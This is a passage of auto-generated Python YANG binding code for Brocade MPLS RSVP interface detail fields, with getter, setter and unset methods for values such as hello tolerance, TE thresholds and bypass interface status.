Setter method for mpls_rsvp_interface_hello_tolerance, mapped from YANG variable /brocade_mpls_rpc/show_mpls_rsvp_interface_one_interface/output/mpls_rsvp_interface_detail/show_mpls_rsvp_interface_detail/mpls_rsvp_interface_hello_tolerance (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_mpls_rsvp_interface_hello_tolerance is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_mpls_rsvp_interface_hello_tolerance() directly.
YANG Description: RSVP Hello tolerance for the RSVP Interface
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="mpls-rsvp-interface-hello-tolerance", rest_name="mpls-rsvp-interface-hello-tolerance", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """mpls_rsvp_interface_hello_tolerance must be of a type compatible with uint32""",
'defined-type': "uint32",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="mpls-rsvp-interface-hello-tolerance", rest_name="mpls-rsvp-interface-hello-tolerance", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)""",
})
self.__mpls_rsvp_interface_hello_tolerance = t
if hasattr(self, '_set'):
self._set()
def _unset_mpls_rsvp_interface_hello_tolerance(self):
self.__mpls_rsvp_interface_hello_tolerance = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="mpls-rsvp-interface-hello-tolerance", rest_name="mpls-rsvp-interface-hello-tolerance", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
def _get_mpls_rsvp_interface_hello_status(self):
"""
Getter method for mpls_rsvp_interface_hello_status, mapped from YANG variable /brocade_mpls_rpc/show_mpls_rsvp_interface_one_interface/output/mpls_rsvp_interface_detail/show_mpls_rsvp_interface_detail/mpls_rsvp_interface_hello_status (string)
YANG Description: RSVP Hello status for the RSVP Interface
"""
return self.__mpls_rsvp_interface_hello_status
def _set_mpls_rsvp_interface_hello_status(self, v, load=False):
"""
Setter method for mpls_rsvp_interface_hello_status, mapped from YANG variable /brocade_mpls_rpc/show_mpls_rsvp_interface_one_interface/output/mpls_rsvp_interface_detail/show_mpls_rsvp_interface_detail/mpls_rsvp_interface_hello_status (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_mpls_rsvp_interface_hello_status is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_mpls_rsvp_interface_hello_status() directly.
YANG Description: RSVP Hello status for the RSVP Interface
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=unicode, is_leaf=True, yang_name="mpls-rsvp-interface-hello-status", rest_name="mpls-rsvp-interface-hello-status", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """mpls_rsvp_interface_hello_status must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=unicode, is_leaf=True, yang_name="mpls-rsvp-interface-hello-status", rest_name="mpls-rsvp-interface-hello-status", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)""",
})
self.__mpls_rsvp_interface_hello_status = t
if hasattr(self, '_set'):
self._set()
def _unset_mpls_rsvp_interface_hello_status(self):
self.__mpls_rsvp_interface_hello_status = YANGDynClass(base=unicode, is_leaf=True, yang_name="mpls-rsvp-interface-hello-status", rest_name="mpls-rsvp-interface-hello-status", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
def _get_mpls_rsvp_interface_te_up_thresholds(self):
"""
Getter method for mpls_rsvp_interface_te_up_thresholds, mapped from YANG variable /brocade_mpls_rpc/show_mpls_rsvp_interface_one_interface/output/mpls_rsvp_interface_detail/show_mpls_rsvp_interface_detail/mpls_rsvp_interface_te_up_thresholds (uint32)
YANG Description: MPLS TE flooding UP thresholds in use for the RSVP Interface
"""
return self.__mpls_rsvp_interface_te_up_thresholds
def _set_mpls_rsvp_interface_te_up_thresholds(self, v, load=False):
"""
Setter method for mpls_rsvp_interface_te_up_thresholds, mapped from YANG variable /brocade_mpls_rpc/show_mpls_rsvp_interface_one_interface/output/mpls_rsvp_interface_detail/show_mpls_rsvp_interface_detail/mpls_rsvp_interface_te_up_thresholds (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_mpls_rsvp_interface_te_up_thresholds is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_mpls_rsvp_interface_te_up_thresholds() directly.
YANG Description: MPLS TE flooding UP thresholds in use for the RSVP Interface
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=TypedListType(allowed_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32)), is_leaf=False, yang_name="mpls-rsvp-interface-te-up-thresholds", rest_name="mpls-rsvp-interface-te-up-thresholds", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """mpls_rsvp_interface_te_up_thresholds must be of a type compatible with uint32""",
'defined-type': "uint32",
'generated-type': """YANGDynClass(base=TypedListType(allowed_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32)), is_leaf=False, yang_name="mpls-rsvp-interface-te-up-thresholds", rest_name="mpls-rsvp-interface-te-up-thresholds", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)""",
})
self.__mpls_rsvp_interface_te_up_thresholds = t
if hasattr(self, '_set'):
self._set()
def _unset_mpls_rsvp_interface_te_up_thresholds(self):
self.__mpls_rsvp_interface_te_up_thresholds = YANGDynClass(base=TypedListType(allowed_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32)), is_leaf=False, yang_name="mpls-rsvp-interface-te-up-thresholds", rest_name="mpls-rsvp-interface-te-up-thresholds", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
def _get_mpls_rsvp_interface_te_down_thresholds(self):
"""
Getter method for mpls_rsvp_interface_te_down_thresholds, mapped from YANG variable /brocade_mpls_rpc/show_mpls_rsvp_interface_one_interface/output/mpls_rsvp_interface_detail/show_mpls_rsvp_interface_detail/mpls_rsvp_interface_te_down_thresholds (uint32)
YANG Description: MPLS TE flooding DOWN thresholds in use for the RSVP Interface
"""
return self.__mpls_rsvp_interface_te_down_thresholds
def _set_mpls_rsvp_interface_te_down_thresholds(self, v, load=False):
"""
Setter method for mpls_rsvp_interface_te_down_thresholds, mapped from YANG variable /brocade_mpls_rpc/show_mpls_rsvp_interface_one_interface/output/mpls_rsvp_interface_detail/show_mpls_rsvp_interface_detail/mpls_rsvp_interface_te_down_thresholds (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_mpls_rsvp_interface_te_down_thresholds is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_mpls_rsvp_interface_te_down_thresholds() directly.
YANG Description: MPLS TE flooding DOWN thresholds in use for the RSVP Interface
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=TypedListType(allowed_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32)), is_leaf=False, yang_name="mpls-rsvp-interface-te-down-thresholds", rest_name="mpls-rsvp-interface-te-down-thresholds", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """mpls_rsvp_interface_te_down_thresholds must be of a type compatible with uint32""",
'defined-type': "uint32",
'generated-type': """YANGDynClass(base=TypedListType(allowed_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32)), is_leaf=False, yang_name="mpls-rsvp-interface-te-down-thresholds", rest_name="mpls-rsvp-interface-te-down-thresholds", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)""",
})
self.__mpls_rsvp_interface_te_down_thresholds = t
if hasattr(self, '_set'):
self._set()
def _unset_mpls_rsvp_interface_te_down_thresholds(self):
self.__mpls_rsvp_interface_te_down_thresholds = YANGDynClass(base=TypedListType(allowed_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32)), is_leaf=False, yang_name="mpls-rsvp-interface-te-down-thresholds", rest_name="mpls-rsvp-interface-te-down-thresholds", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
def _get_g_mpls_prot_statistics_pkt_types(self):
"""
Getter method for g_mpls_prot_statistics_pkt_types, mapped from YANG variable /brocade_mpls_rpc/show_mpls_rsvp_interface_one_interface/output/mpls_rsvp_interface_detail/show_mpls_rsvp_interface_detail/g_mpls_prot_statistics_pkt_types (list)
YANG Description: Statistics for MPLS PROT packet types
"""
return self.__g_mpls_prot_statistics_pkt_types
def _set_g_mpls_prot_statistics_pkt_types(self, v, load=False):
"""
Setter method for g_mpls_prot_statistics_pkt_types, mapped from YANG variable /brocade_mpls_rpc/show_mpls_rsvp_interface_one_interface/output/mpls_rsvp_interface_detail/show_mpls_rsvp_interface_detail/g_mpls_prot_statistics_pkt_types (list)
If this variable is read-only (config: false) in the
source YANG file, then _set_g_mpls_prot_statistics_pkt_types is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_g_mpls_prot_statistics_pkt_types() directly.
YANG Description: Statistics for MPLS PROT packet types
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGListType(False,g_mpls_prot_statistics_pkt_types.g_mpls_prot_statistics_pkt_types, yang_name="g_mpls_prot_statistics_pkt_types", rest_name="g_mpls_prot_statistics_pkt_types", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='False', extensions=None), is_container='list', yang_name="g_mpls_prot_statistics_pkt_types", rest_name="g_mpls_prot_statistics_pkt_types", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, extensions=None, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='list', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """g_mpls_prot_statistics_pkt_types must be of a type compatible with list""",
'defined-type': "list",
'generated-type': """YANGDynClass(base=YANGListType(False,g_mpls_prot_statistics_pkt_types.g_mpls_prot_statistics_pkt_types, yang_name="g_mpls_prot_statistics_pkt_types", rest_name="g_mpls_prot_statistics_pkt_types", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='False', extensions=None), is_container='list', yang_name="g_mpls_prot_statistics_pkt_types", rest_name="g_mpls_prot_statistics_pkt_types", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, extensions=None, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='list', is_config=True)""",
})
self.__g_mpls_prot_statistics_pkt_types = t
if hasattr(self, '_set'):
self._set()
def _unset_g_mpls_prot_statistics_pkt_types(self):
self.__g_mpls_prot_statistics_pkt_types = YANGDynClass(base=YANGListType(False,g_mpls_prot_statistics_pkt_types.g_mpls_prot_statistics_pkt_types, yang_name="g_mpls_prot_statistics_pkt_types", rest_name="g_mpls_prot_statistics_pkt_types", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='False', extensions=None), is_container='list', yang_name="g_mpls_prot_statistics_pkt_types", rest_name="g_mpls_prot_statistics_pkt_types", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, extensions=None, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='list', is_config=True)
def _get_g_mpls_prot_statistics_errors(self):
"""
Getter method for g_mpls_prot_statistics_errors, mapped from YANG variable /brocade_mpls_rpc/show_mpls_rsvp_interface_one_interface/output/mpls_rsvp_interface_detail/show_mpls_rsvp_interface_detail/g_mpls_prot_statistics_errors (list)
YANG Description: Error statistics for MPLS PROT control packets
"""
return self.__g_mpls_prot_statistics_errors
def _set_g_mpls_prot_statistics_errors(self, v, load=False):
"""
Setter method for g_mpls_prot_statistics_errors, mapped from YANG variable /brocade_mpls_rpc/show_mpls_rsvp_interface_one_interface/output/mpls_rsvp_interface_detail/show_mpls_rsvp_interface_detail/g_mpls_prot_statistics_errors (list)
If this variable is read-only (config: false) in the
source YANG file, then _set_g_mpls_prot_statistics_errors is considered a private
method. Backends looking to populate this variable should
do so by calling thisObj._set_g_mpls_prot_statistics_errors() directly.
YANG Description: Error statistics for MPLS PROT control packets
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGListType(False,g_mpls_prot_statistics_errors.g_mpls_prot_statistics_errors, yang_name="g_mpls_prot_statistics_errors", rest_name="g_mpls_prot_statistics_errors", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='False', extensions=None), is_container='list', yang_name="g_mpls_prot_statistics_errors", rest_name="g_mpls_prot_statistics_errors", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, extensions=None, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='list', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """g_mpls_prot_statistics_errors must be of a type compatible with list""",
'defined-type': "list",
'generated-type': """YANGDynClass(base=YANGListType(False,g_mpls_prot_statistics_errors.g_mpls_prot_statistics_errors, yang_name="g_mpls_prot_statistics_errors", rest_name="g_mpls_prot_statistics_errors", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='False', extensions=None), is_container='list', yang_name="g_mpls_prot_statistics_errors", rest_name="g_mpls_prot_statistics_errors", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, extensions=None, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='list', is_config=True)""",
})
self.__g_mpls_prot_statistics_errors = t
if hasattr(self, '_set'):
self._set()
def _unset_g_mpls_prot_statistics_errors(self):
self.__g_mpls_prot_statistics_errors = YANGDynClass(base=YANGListType(False,g_mpls_prot_statistics_errors.g_mpls_prot_statistics_errors, yang_name="g_mpls_prot_statistics_errors", rest_name="g_mpls_prot_statistics_errors", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='False', extensions=None), is_container='list', yang_name="g_mpls_prot_statistics_errors", rest_name="g_mpls_prot_statistics_errors", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, extensions=None, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='list', is_config=True)
def _get_mpls_rsvp_interface_active_backup_outsegs(self):
"""
Getter method for mpls_rsvp_interface_active_backup_outsegs, mapped from YANG variable /brocade_mpls_rpc/show_mpls_rsvp_interface_one_interface/output/mpls_rsvp_interface_detail/show_mpls_rsvp_interface_detail/mpls_rsvp_interface_active_backup_outsegs (uint32)
YANG Description: Number of Active backup Out Segments on the RSVP Interface
"""
return self.__mpls_rsvp_interface_active_backup_outsegs
def _set_mpls_rsvp_interface_active_backup_outsegs(self, v, load=False):
"""
Setter method for mpls_rsvp_interface_active_backup_outsegs, mapped from YANG variable /brocade_mpls_rpc/show_mpls_rsvp_interface_one_interface/output/mpls_rsvp_interface_detail/show_mpls_rsvp_interface_detail/mpls_rsvp_interface_active_backup_outsegs (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_mpls_rsvp_interface_active_backup_outsegs is considered a private
method. Backends looking to populate this variable should
do so by calling thisObj._set_mpls_rsvp_interface_active_backup_outsegs() directly.
YANG Description: Number of Active backup Out Segments on the RSVP Interface
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="mpls-rsvp-interface-active-backup-outsegs", rest_name="mpls-rsvp-interface-active-backup-outsegs", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """mpls_rsvp_interface_active_backup_outsegs must be of a type compatible with uint32""",
'defined-type': "uint32",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="mpls-rsvp-interface-active-backup-outsegs", rest_name="mpls-rsvp-interface-active-backup-outsegs", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)""",
})
self.__mpls_rsvp_interface_active_backup_outsegs = t
if hasattr(self, '_set'):
self._set()
def _unset_mpls_rsvp_interface_active_backup_outsegs(self):
self.__mpls_rsvp_interface_active_backup_outsegs = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="mpls-rsvp-interface-active-backup-outsegs", rest_name="mpls-rsvp-interface-active-backup-outsegs", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
def _get_mpls_rsvp_interface_inactive_backup_outsegs(self):
"""
Getter method for mpls_rsvp_interface_inactive_backup_outsegs, mapped from YANG variable /brocade_mpls_rpc/show_mpls_rsvp_interface_one_interface/output/mpls_rsvp_interface_detail/show_mpls_rsvp_interface_detail/mpls_rsvp_interface_inactive_backup_outsegs (uint32)
YANG Description: Number of Inactive backup Out Segments on the RSVP Interface
"""
return self.__mpls_rsvp_interface_inactive_backup_outsegs
def _set_mpls_rsvp_interface_inactive_backup_outsegs(self, v, load=False):
"""
Setter method for mpls_rsvp_interface_inactive_backup_outsegs, mapped from YANG variable /brocade_mpls_rpc/show_mpls_rsvp_interface_one_interface/output/mpls_rsvp_interface_detail/show_mpls_rsvp_interface_detail/mpls_rsvp_interface_inactive_backup_outsegs (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_mpls_rsvp_interface_inactive_backup_outsegs is considered a private
method. Backends looking to populate this variable should
do so by calling thisObj._set_mpls_rsvp_interface_inactive_backup_outsegs() directly.
YANG Description: Number of Inactive backup Out Segments on the RSVP Interface
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="mpls-rsvp-interface-inactive-backup-outsegs", rest_name="mpls-rsvp-interface-inactive-backup-outsegs", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """mpls_rsvp_interface_inactive_backup_outsegs must be of a type compatible with uint32""",
'defined-type': "uint32",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="mpls-rsvp-interface-inactive-backup-outsegs", rest_name="mpls-rsvp-interface-inactive-backup-outsegs", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)""",
})
self.__mpls_rsvp_interface_inactive_backup_outsegs = t
if hasattr(self, '_set'):
self._set()
def _unset_mpls_rsvp_interface_inactive_backup_outsegs(self):
self.__mpls_rsvp_interface_inactive_backup_outsegs = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="mpls-rsvp-interface-inactive-backup-outsegs", rest_name="mpls-rsvp-interface-inactive-backup-outsegs", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
def _get_mpls_rsvp_interface_duplicate_preempts_dropped(self):
"""
Getter method for mpls_rsvp_interface_duplicate_preempts_dropped, mapped from YANG variable /brocade_mpls_rpc/show_mpls_rsvp_interface_one_interface/output/mpls_rsvp_interface_detail/show_mpls_rsvp_interface_detail/mpls_rsvp_interface_duplicate_preempts_dropped (uint32)
YANG Description: Number of Duplicate preempts dropped on the RSVP Interface
"""
return self.__mpls_rsvp_interface_duplicate_preempts_dropped
def _set_mpls_rsvp_interface_duplicate_preempts_dropped(self, v, load=False):
"""
Setter method for mpls_rsvp_interface_duplicate_preempts_dropped, mapped from YANG variable /brocade_mpls_rpc/show_mpls_rsvp_interface_one_interface/output/mpls_rsvp_interface_detail/show_mpls_rsvp_interface_detail/mpls_rsvp_interface_duplicate_preempts_dropped (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_mpls_rsvp_interface_duplicate_preempts_dropped is considered a private
method. Backends looking to populate this variable should
do so by calling thisObj._set_mpls_rsvp_interface_duplicate_preempts_dropped() directly.
YANG Description: Number of Duplicate preempts dropped on the RSVP Interface
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="mpls-rsvp-interface-duplicate-preempts-dropped", rest_name="mpls-rsvp-interface-duplicate-preempts-dropped", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """mpls_rsvp_interface_duplicate_preempts_dropped must be of a type compatible with uint32""",
'defined-type': "uint32",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="mpls-rsvp-interface-duplicate-preempts-dropped", rest_name="mpls-rsvp-interface-duplicate-preempts-dropped", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)""",
})
self.__mpls_rsvp_interface_duplicate_preempts_dropped = t
if hasattr(self, '_set'):
self._set()
def _unset_mpls_rsvp_interface_duplicate_preempts_dropped(self):
self.__mpls_rsvp_interface_duplicate_preempts_dropped = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="mpls-rsvp-interface-duplicate-preempts-dropped", rest_name="mpls-rsvp-interface-duplicate-preempts-dropped", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
def _get_mpls_rsvp_interface_p2mp_capability(self):
"""
Getter method for mpls_rsvp_interface_p2mp_capability, mapped from YANG variable /brocade_mpls_rpc/show_mpls_rsvp_interface_one_interface/output/mpls_rsvp_interface_detail/show_mpls_rsvp_interface_detail/mpls_rsvp_interface_p2mp_capability (boolean)
YANG Description: P2MP capability of RSVP interface
"""
return self.__mpls_rsvp_interface_p2mp_capability
def _set_mpls_rsvp_interface_p2mp_capability(self, v, load=False):
"""
Setter method for mpls_rsvp_interface_p2mp_capability, mapped from YANG variable /brocade_mpls_rpc/show_mpls_rsvp_interface_one_interface/output/mpls_rsvp_interface_detail/show_mpls_rsvp_interface_detail/mpls_rsvp_interface_p2mp_capability (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_mpls_rsvp_interface_p2mp_capability is considered a private
method. Backends looking to populate this variable should
do so by calling thisObj._set_mpls_rsvp_interface_p2mp_capability() directly.
YANG Description: P2MP capability of RSVP interface
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="mpls-rsvp-interface-p2mp-capability", rest_name="mpls-rsvp-interface-p2mp-capability", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """mpls_rsvp_interface_p2mp_capability must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="mpls-rsvp-interface-p2mp-capability", rest_name="mpls-rsvp-interface-p2mp-capability", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)""",
})
self.__mpls_rsvp_interface_p2mp_capability = t
if hasattr(self, '_set'):
self._set()
def _unset_mpls_rsvp_interface_p2mp_capability(self):
self.__mpls_rsvp_interface_p2mp_capability = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="mpls-rsvp-interface-p2mp-capability", rest_name="mpls-rsvp-interface-p2mp-capability", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
def _get_mpls_rsvp_interface_bypass_interface(self):
"""
Getter method for mpls_rsvp_interface_bypass_interface, mapped from YANG variable /brocade_mpls_rpc/show_mpls_rsvp_interface_one_interface/output/mpls_rsvp_interface_detail/show_mpls_rsvp_interface_detail/mpls_rsvp_interface_bypass_interface (boolean)
YANG Description: Is RSVP interface a bypass interface
"""
return self.__mpls_rsvp_interface_bypass_interface
def _set_mpls_rsvp_interface_bypass_interface(self, v, load=False):
"""
Setter method for mpls_rsvp_interface_bypass_interface, mapped from YANG variable /brocade_mpls_rpc/show_mpls_rsvp_interface_one_interface/output/mpls_rsvp_interface_detail/show_mpls_rsvp_interface_detail/mpls_rsvp_interface_bypass_interface (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_mpls_rsvp_interface_bypass_interface is considered a private
method. Backends looking to populate this variable should
do so by calling thisObj._set_mpls_rsvp_interface_bypass_interface() directly.
YANG Description: Is RSVP interface a bypass interface
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="mpls-rsvp-interface-bypass-interface", rest_name="mpls-rsvp-interface-bypass-interface", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """mpls_rsvp_interface_bypass_interface must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="mpls-rsvp-interface-bypass-interface", rest_name="mpls-rsvp-interface-bypass-interface", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)""",
})
self.__mpls_rsvp_interface_bypass_interface = t
if hasattr(self, '_set'):
self._set()
def _unset_mpls_rsvp_interface_bypass_interface(self):
self.__mpls_rsvp_interface_bypass_interface = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="mpls-rsvp-interface-bypass-interface", rest_name="mpls-rsvp-interface-bypass-interface", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
def _get_mpls_rsvp_interface_tunnel_name(self):
"""
Getter method for mpls_rsvp_interface_tunnel_name, mapped from YANG variable /brocade_mpls_rpc/show_mpls_rsvp_interface_one_interface/output/mpls_rsvp_interface_detail/show_mpls_rsvp_interface_detail/mpls_rsvp_interface_tunnel_name (string)
YANG Description: Bypass LSP name
"""
return self.__mpls_rsvp_interface_tunnel_name
def _set_mpls_rsvp_interface_tunnel_name(self, v, load=False):
"""
Setter method for mpls_rsvp_interface_tunnel_name, mapped from YANG variable /brocade_mpls_rpc/show_mpls_rsvp_interface_one_interface/output/mpls_rsvp_interface_detail/show_mpls_rsvp_interface_detail/mpls_rsvp_interface_tunnel_name (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_mpls_rsvp_interface_tunnel_name is considered a private
method. Backends looking to populate this variable should
